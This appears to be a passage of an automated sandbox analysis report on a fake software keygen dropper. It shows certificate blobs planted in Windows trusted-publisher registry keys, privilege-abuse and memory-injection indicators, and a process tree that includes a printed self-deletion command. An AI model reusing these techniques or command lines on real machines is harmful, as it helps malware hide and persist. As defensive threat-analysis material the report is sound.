ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 g4pugkmvbnp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 1444 PING.EXE 5380 PING.EXE 3104 PING.EXE 9016 PING.EXE 2444 PING.EXE -
Script User-Agent 48 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 1160 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 137 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 411 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 420 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 778 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 782 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 990 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1019 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1175 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 175 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 755 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1008 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1026 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1048 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1169 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 140 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 345 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 430 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 762 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1190 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 179 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 354 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1157 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1161 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1179 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1256 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 202 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 347 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 417 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 995 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1015 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1040 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1246 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 142 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 191 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 208 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 408 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1016 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1034 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1201 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 753 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 776 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1165 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 987 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1011 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1012 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1029 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1068 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 196 setups.tmp 196 setups.tmp 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 2600 multitimer.exe 3968 rundll32.exe 3968 rundll32.exe 4812 svchost.exe 4812 svchost.exe 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5880 IBInstaller_97039.tmp 5880 IBInstaller_97039.tmp 5904 muwrgmlshuf.tmp 5904 muwrgmlshuf.tmp 6004 win1host.exe 6004 win1host.exe 6004 win1host.exe 6004 win1host.exe 3600 jfiag3g_gg.exe 3600 jfiag3g_gg.exe 5592 AdvancedRun.exe 5592 AdvancedRun.exe 5592 AdvancedRun.exe 5592 AdvancedRun.exe 2112 setups.tmp 2112 setups.tmp 4092 rundll32.exe 4092 rundll32.exe 8 rundll32.exe 8 rundll32.exe 5760 AdvancedRun.exe 5760 AdvancedRun.exe 5760 AdvancedRun.exe 5760 AdvancedRun.exe 4740 powershell.exe 4740 powershell.exe 2184 1.exe 2184 1.exe 2184 1.exe 2184 1.exe 4740 powershell.exe 5172 WerFault.exe 5172 WerFault.exe 5172 WerFault.exe 5172 WerFault.exe 5172 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2852 Process not Found -
Suspicious behavior: MapViewOfSection 21 IoCs
pid Process 4084 MicrosoftEdgeCP.exe 4084 MicrosoftEdgeCP.exe 7320 toolspab1.exe 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found 2852 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1948 Setup.exe Token: SeCreateTokenPrivilege 1896 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1896 askinstall20.exe Token: SeLockMemoryPrivilege 1896 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1896 askinstall20.exe Token: SeMachineAccountPrivilege 1896 askinstall20.exe Token: SeTcbPrivilege 1896 askinstall20.exe Token: SeSecurityPrivilege 1896 askinstall20.exe Token: SeTakeOwnershipPrivilege 1896 askinstall20.exe Token: SeLoadDriverPrivilege 1896 askinstall20.exe Token: SeSystemProfilePrivilege 1896 askinstall20.exe Token: SeSystemtimePrivilege 1896 askinstall20.exe Token: SeProfSingleProcessPrivilege 1896 askinstall20.exe Token: SeIncBasePriorityPrivilege 1896 askinstall20.exe Token: SeCreatePagefilePrivilege 1896 askinstall20.exe Token: SeCreatePermanentPrivilege 1896 askinstall20.exe Token: SeBackupPrivilege 1896 askinstall20.exe Token: SeRestorePrivilege 1896 askinstall20.exe Token: SeShutdownPrivilege 1896 askinstall20.exe Token: SeDebugPrivilege 1896 askinstall20.exe Token: SeAuditPrivilege 1896 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1896 askinstall20.exe Token: SeChangeNotifyPrivilege 1896 askinstall20.exe Token: SeRemoteShutdownPrivilege 1896 askinstall20.exe Token: SeUndockPrivilege 1896 askinstall20.exe Token: SeSyncAgentPrivilege 1896 askinstall20.exe Token: SeEnableDelegationPrivilege 1896 askinstall20.exe Token: SeManageVolumePrivilege 1896 askinstall20.exe Token: SeImpersonatePrivilege 1896 askinstall20.exe Token: SeCreateGlobalPrivilege 1896 askinstall20.exe Token: 31 1896 askinstall20.exe Token: 32 1896 askinstall20.exe Token: 33 1896 askinstall20.exe Token: 34 1896 askinstall20.exe Token: 35 1896 askinstall20.exe Token: SeDebugPrivilege 2600 multitimer.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeDebugPrivilege 3608 MicrosoftEdge.exe Token: SeDebugPrivilege 3608 MicrosoftEdge.exe Token: SeDebugPrivilege 3608 MicrosoftEdge.exe Token: SeDebugPrivilege 3608 MicrosoftEdge.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeTcbPrivilege 4812 svchost.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 1456 multitimer.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 3968 rundll32.exe Token: SeDebugPrivilege 684 multitimer.exe Token: SeDebugPrivilege 684 multitimer.exe Token: SeDebugPrivilege 684 multitimer.exe Token: SeDebugPrivilege 684 multitimer.exe Token: SeLockMemoryPrivilege 5188 msiexec.exe Token: SeLockMemoryPrivilege 5188 msiexec.exe Token: SeDebugPrivilege 5352 vpn.tmp Token: SeDebugPrivilege 5352 vpn.tmp -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5688 Setup3310.tmp 5396 g4pugkmvbnp.exe 5352 vpn.tmp 5880 IBInstaller_97039.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5904 muwrgmlshuf.tmp 5888 vict.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 2944 setups.exe 196 setups.tmp 3608 MicrosoftEdge.exe 4084 MicrosoftEdgeCP.exe 4084 MicrosoftEdgeCP.exe 5588 Setup3310.exe 5564 cpyrix.exe 5688 Setup3310.tmp 5732 vict.exe 5724 muwrgmlshuf.exe 5888 vict.tmp 5904 muwrgmlshuf.tmp 4160 vpn.exe 5352 vpn.tmp 5544 IBInstaller_97039.exe 5880 IBInstaller_97039.tmp 6040 Setup.exe 6004 win1host.exe 5944 winlthsth.exe 5844 hjjgaa.exe 2188 RunWW.exe 5184 jg7_7wjg.exe 5520 LabPicV3.exe 5328 lylal220.exe 5776 guihuali-game.exe 6048 lylal220.tmp 6128 LabPicV3.tmp 5912 22.exe 4632 jfiag3g_gg.exe 3600 jfiag3g_gg.exe 5284 setups.exe 5592 AdvancedRun.exe 2112 setups.tmp 2416 tapinstall.exe 3700 TSCfPHLZs.exe 1816 eCUEGYWHo.exe 5132 dw20.exe 5660 irecord.exe 984 irecord.tmp 5016 prolab.exe 3016 prolab.tmp 6112 explorer.exe 6808 cpyrix.exe 7176 vpn.exe 7196 Setup3310.exe 7296 Setup3310.tmp 7288 vpn.tmp 7376 md6_6ydj.exe 7856 md6_6ydj.exe 7948 askinstall31.exe 7956 vict.exe 8092 vict.tmp 5748 askinstall31.exe 3748 win1host.exe 6696 cmd.exe 7544 Setup.exe 7580 AdvancedRun.exe 5132 dw20.exe 7944 dw20.exe 4628 mask_svc.exe 6376 setup_10.2_mix.exe 5276 file.exe 7092 mask_svc.exe 1428 setup_10.2_mix.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4724 wrote to memory of 3460 4724 Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe 78 PID 4724 wrote to memory of 3460 4724 Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe 78 PID 4724 wrote to memory of 3460 4724 Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe 78 PID 3460 wrote to memory of 4360 3460 cmd.exe 81 PID 3460 wrote to memory of 4360 3460 cmd.exe 81 PID 3460 wrote to memory of 4360 3460 cmd.exe 81 PID 3460 wrote to memory of 3140 3460 cmd.exe 82 PID 3460 wrote to memory of 3140 3460 cmd.exe 82 PID 3460 wrote to memory of 3140 3460 cmd.exe 82 PID 3460 wrote to memory of 4048 3460 cmd.exe 83 PID 3460 wrote to memory of 4048 3460 cmd.exe 83 PID 3460 wrote to memory of 4048 3460 cmd.exe 83 PID 3460 wrote to memory of 4428 3460 cmd.exe 84 PID 3460 wrote to memory of 4428 3460 cmd.exe 84 PID 3460 wrote to memory of 4428 3460 cmd.exe 84 PID 4360 wrote to memory of 1556 4360 keygen-pr.exe 85 PID 4360 wrote to memory of 1556 4360 keygen-pr.exe 85 PID 4360 wrote to memory of 1556 4360 keygen-pr.exe 85 PID 4428 wrote to memory of 1948 4428 keygen-step-4.exe 86 PID 4428 wrote to memory of 1948 4428 keygen-step-4.exe 86 PID 4048 wrote to memory of 2284 4048 keygen-step-3.exe 87 PID 4048 wrote to memory of 2284 4048 keygen-step-3.exe 87 PID 4048 wrote to memory of 2284 4048 keygen-step-3.exe 87 PID 1556 wrote to memory of 2548 1556 key.exe 89 PID 1556 wrote to memory of 2548 1556 key.exe 89 PID 1556 wrote to memory of 2548 1556 key.exe 89 PID 2284 wrote to memory of 2444 2284 cmd.exe 90 PID 2284 wrote to memory of 2444 2284 cmd.exe 90 PID 2284 wrote to memory of 2444 2284 cmd.exe 90 PID 1948 wrote to memory of 2600 1948 Setup.exe 91 PID 1948 wrote to memory of 2600 1948 Setup.exe 91 PID 1948 wrote to memory of 2944 1948 Setup.exe 92 PID 1948 wrote to memory of 2944 1948 Setup.exe 92 PID 1948 wrote to memory of 2944 1948 Setup.exe 92 PID 4428 wrote to memory of 1896 4428 keygen-step-4.exe 93 PID 4428 wrote to memory of 1896 4428 keygen-step-4.exe 93 PID 4428 wrote to memory of 1896 4428 keygen-step-4.exe 93 PID 2944 wrote to memory of 196 2944 setups.exe 94 PID 2944 wrote to memory of 196 2944 setups.exe 94 PID 2944 wrote to memory of 196 2944 setups.exe 94 PID 1896 wrote to memory of 5032 1896 askinstall20.exe 96 PID 1896 wrote to memory of 5032 1896 askinstall20.exe 96 PID 1896 wrote to memory of 5032 1896 askinstall20.exe 96 PID 5032 wrote to memory of 2576 5032 cmd.exe 98 PID 5032 wrote to memory of 2576 5032 cmd.exe 98 PID 5032 wrote to memory of 2576 5032 cmd.exe 98 PID 4428 wrote to memory of 1116 4428 keygen-step-4.exe 103 PID 4428 wrote to memory of 1116 4428 keygen-step-4.exe 103 PID 4428 wrote to memory of 1116 4428 keygen-step-4.exe 103 PID 2600 wrote to memory of 1168 2600 multitimer.exe 104 PID 2600 wrote to memory of 1168 2600 multitimer.exe 104 PID 1116 wrote to memory of 1780 1116 Full_Version.exe 105 PID 1116 wrote to memory of 1780 1116 Full_Version.exe 105 PID 1116 wrote to memory of 1780 1116 Full_Version.exe 105 PID 4428 wrote to memory of 4464 4428 keygen-step-4.exe 106 PID 4428 wrote to memory of 4464 4428 keygen-step-4.exe 106 PID 4428 wrote to memory of 4464 4428 keygen-step-4.exe 106 PID 1168 wrote to memory of 1456 1168 multitimer.exe 107 PID 1168 wrote to memory of 1456 1168 multitimer.exe 107 PID 1780 wrote to memory of 3968 1780 WScript.exe 108 PID 1780 wrote to memory of 3968 1780 WScript.exe 108 PID 1780 wrote to memory of 3968 1780 WScript.exe 108 PID 3968 wrote to memory of 4812 3968 rundll32.exe 70 PID 3968 wrote to memory of 2492 3968 rundll32.exe 26
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2472
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2464
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2256
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2224
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
- Modifies registry class
PID:1872
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1388
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1232
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1224
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1056
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1000
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:64
-
C:\Users\Admin\AppData\Local\Temp\Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe"C:\Users\Admin\AppData\Local\Temp\Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2548
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2444
-
-
-
-
